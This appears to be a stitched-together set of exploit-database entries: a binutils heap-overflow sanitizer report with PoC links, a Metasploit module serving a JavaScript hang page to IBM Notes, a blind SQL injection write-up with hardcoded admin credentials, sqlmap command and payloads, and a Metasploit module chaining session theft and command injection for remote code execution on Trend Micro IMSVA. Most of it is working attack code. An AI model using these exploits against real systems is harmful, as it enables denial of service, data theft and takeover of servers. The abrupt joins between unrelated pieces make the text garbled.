#4 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11
#5 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10
#6 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9
#7 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7
#8 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200
#9 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7
#10 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12
#11 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
#12 0x41ac18 in _init (/usr/x86_64-pc-linux-gnu/binutils-bin/git/nm+0x41ac18)
0x613000000512 is located 0 bytes to the right of 338-byte region [0x6130000003c0,0x613000000512)
allocated by thread T0 here:
#0 0x4d8e08 in malloc /var/tmp/portage/sys-libs/compiler-rt-sanitizers-5.0.0/work/compiler-rt-5.0.0.src/lib/asan/asan_malloc_linux.cc:67
#1 0x7f7c9393a37c in bfd_malloc /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/libbfd.c:193:9
#2 0x7f7c9392fb2f in bfd_get_full_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/compress.c:248:21
#3 0x7f7c939696d3 in bfd_simple_get_relocated_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/simple.c:193:12
#4 0x7f7c93ade26e in read_section /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:556:8
#5 0x7f7c93adef3c in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2047:9
#6 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26
#7 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643
#8 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11
#9 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10
#10 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9
#11 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7
#12 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200
#13 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7
#14 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12
#15 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289
SUMMARY: AddressSanitizer: heap-buffer-overflow /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10 in read_1_byte
Shadow bytes around the buggy address:
0x0c267fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c267fff8060: 00 00 00 00 00 00 00 00 00 00 00 04 fa fa fa fa
0x0c267fff8070: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c267fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c267fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c267fff80a0: 00 00[02]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c267fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3235==ABORTING
Affected version:
2.29.51.20170921 and maybe past releases
Fixed version:
N/A
Commit fix:
https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=515f23e63c0074ab531bc954f84ca40c6281a724
Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.
CVE:
CVE-2017-14939
Reproducer:
https://github.com/asarubbo/poc/blob/master/00370-binutils-heapoverflow-read_1_byte
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42970.zip
Timeline:
2017-09-21: bug discovered and reported to upstream
2017-09-24: upstream released a patch
2017-09-26: blog post about the issue
2017-09-29: CVE assigned
Note:
This bug was found with American Fuzzy Lop.
This bug was identified with bare metal servers donated by Packet. This work is also supported by the Core Infrastructure Initiative.
Permalink:
https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42970.zip
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
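class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

  # Registers the module metadata: name, description, author, references and
  # the single passive 'WebServer' action that serves the page built in #setup.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "IBM Notes encodeURI DOS",
        'Description' => %q(
This module exploits a vulnerability in the native browser that
comes with IBM Lotus Notes.
If successful, it could cause the Notes client to hang and have
to be restarted.
),
        'License' => MSF_LICENSE,
        'Author' => [
          'Dhiraj Mishra',
        ],
        'References' => [
          [ 'EXPLOIT-DB', '42602'],
          [ 'CVE', '2017-1129' ],
          # Kept on one line: the literal used to be split across two lines,
          # which embedded a newline in the reference URL.
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
        ],
        'DisclosureDate' => 'Aug 31 2017',
        'Actions' => [[ 'WebServer' ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction' => 'WebServer'
      )
    )
  end

  # Auxiliary entry point: delegates to the HttpServer mixin, which starts
  # the listener and dispatches requests to #on_request_uri.
  def run
    exploit # start http server
  end

  # Builds the HTML page served to every client. The embedded script is the
  # DoS trigger described in 'Description'; it is stored in @html so
  # #on_request_uri can send it unchanged.
  def setup
    @html = %|
<html><head><title>DOS</title>
<script type="text/javascript">
while (true) try {
  var object = { };
  function d(d0) {
    var d0 = (object instanceof encodeURI)('foo');
  }
  d(75);
} catch (d) { }
</script>
</head></html>
|
  end

  # Serves @html for any request path; the request itself is not inspected.
  #
  # @param cli [Object] client connection handed over by the HttpServer mixin
  # @param _request [Object] incoming request (unused)
  def on_request_uri(cli, _request)
    print_status('Sending response')
    send_response(cli, @html)
  end
end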
# Exploit Title : Complain Management System Blind SQL Injection
# Date: 10 October 2017
# Exploit Author: havysec
# Tested on: ubuntu14.04
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files
## About The Product :
Complain Management is a web-based project used to manage customer complaints online. Users can log in, create complaints, view complaint details and track the status of their complaints.
## Vulnerability :
Line 88 of the functions.php file contains hardcoded admin credentials.
elseif($uType == 'admin'){
//$_SESSION['user_id'] = $row['sid'];
if($userName == 'admin' && $password == 'admin123'){
$_SESSION['user_id'] = 0;
$_SESSION['user_name'] = 'Administrator';
$_SESSION['user_type'] = 'admin';
header('Location: '.WEB_ROOT.'index.php');
exit;
Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.
-HTTP Method : GET
- Sqlmap command: sqlmap -u 'http://192.168.1.104/view.php?mod=admin&view=repod&id=plans' --cookie="PHPSESSID=t1bc9vj67odrj3bd096g0rffe0"
- Sqlmap Output :
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[00:47:53] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 22 to 40 columns'
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 42 to 60 columns'
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 62 to 80 columns'
[00:47:54] [INFO] testing 'MySQL UNION query (98) - 82 to 100 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 650 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: mod=admin&view=repod&id=plans WHERE 6586=6586 AND 9310=9310#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: mod=admin&view=repod&id=plans WHERE 3317=3317 AND (SELECT 4063 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(4063=4063,1))),0x7170766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: mod=admin&view=repod&id=plans WHERE 4122=4122 AND (SELECT * FROM (SELECT(SLEEP(5)))zWVH)--
---
[00:47:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0
[00:47:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 444 times
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata. The chain is: read an administrator JSESSIONID from the
  # exposed diagnostic.log, open a widget-framework session with it, then hit
  # the modTMCSS proxy controller whose 'TOP' parameter reaches a system call.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution",
      'Description' => %q{
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a
terminal command under the context of the web server user.
The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product
have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which
leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process
does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,
unauthenticated users can execute a terminal command under the context of the web server user.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'mr_me <mr_me@offensive-security.com>', # author of command injection
          'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module
        ],
      'References' =>
        [
          ['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],
          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],
        ],
      'DefaultOptions' =>
        {
          'SSL' => true,
          'RPORT' => 8445
        },
      'Payload' =>
        {
          'Compat' =>
            {
              'ConnectionType' => '-bind'
            },
        },
      'Platform' => ['python'],
      'Arch' => ARCH_PYTHON,
      'Targets' => [[ 'Automatic', {}]],
      'Privileged' => false,
      'DisclosureDate' => "Oct 7 2017",
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the Trend Micro IMSVA management interface', '/'])
      ]
    )
  end

  # Fetches widget/repository/log/diagnostic.log and returns the last session
  # id found in it.
  #
  # @return [String, nil] 32 upper-hex-digit session id, or nil when the log
  #   is unreachable, not a 200, or carries no marker. The marker is spelled
  #   'JSEEEIONID' in the log as matched here; keep it as-is.
  def extract_jsessionid
    log_uri = normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')
    res = send_request_cgi('method' => 'GET', 'uri' => log_uri)
    return nil unless res && res.code == 200 && res.body.include?('JSEEEIONID')

    ids = res.body.scan(/JSEEEIONID:([A-F0-9]{32})/)
    ids.flatten.last
  end

  # Replays a recovered JSESSIONID against widget/index.php.
  #
  # @param jsessionid [String] session id from #extract_jsessionid
  # @return [Object, nil] whatever res.get_cookies returns when the page shows
  #   the 'USER_GENERATED_WIDGET_DIR' marker, otherwise nil
  def widget_auth(jsessionid)
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'widget', 'index.php'),
      'cookie' => "CurrentLocale=en-U=en_US; JSESSIONID=#{jsessionid}"
    )
    authenticated = res && res.code == 200 && res.body.include?('USER_GENERATED_WIDGET_DIR')
    authenticated ? res.get_cookies : nil
  end

  # Vulnerability check: if a leaked id can open a widget session, the target
  # most likely has both issues, so report Appears without running the injection.
  #
  # @return [Exploit::CheckCode] Safe or Appears
  def check
    jsessionid = extract_jsessionid
    return Exploit::CheckCode::Safe if jsessionid.nil?

    widget_auth(jsessionid).nil? ? Exploit::CheckCode::Safe : Exploit::CheckCode::Appears
  end

  # Runs the full chain; each stage aborts via fail_with when its precondition
  # is not met. The final POST response is not inspected (bind payload).
  def exploit
    print_status('Extracting JSESSIONID from publicly accessible log file')
    jsessionid = extract_jsessionid
    fail_with(Failure::NotVulnerable, "Target is not vulnerable.") if jsessionid.nil?
    print_good("Awesome. JSESSIONID value = #{jsessionid}")

    print_status('Initiating session with widget framework')
    cookies = widget_auth(jsessionid)
    fail_with(Failure::NoAccess, "Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA") if cookies.nil?
    print_good('Session with widget framework successfully initiated.')

    print_status('Trigerring command injection vulnerability')
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'widget', 'proxy_controller.php'),
      'cookie' => "CurrentLocale=en-US; LogonUser=root; JSESSIONID=#{jsessionid}; #{cookies}",
      'vars_post' => {
        'module' => 'modTMCSS',
        'serverid' => '1',
        'TOP' => "$(python -c \"#{payload.encoded}\")"
      }
    )
  end
end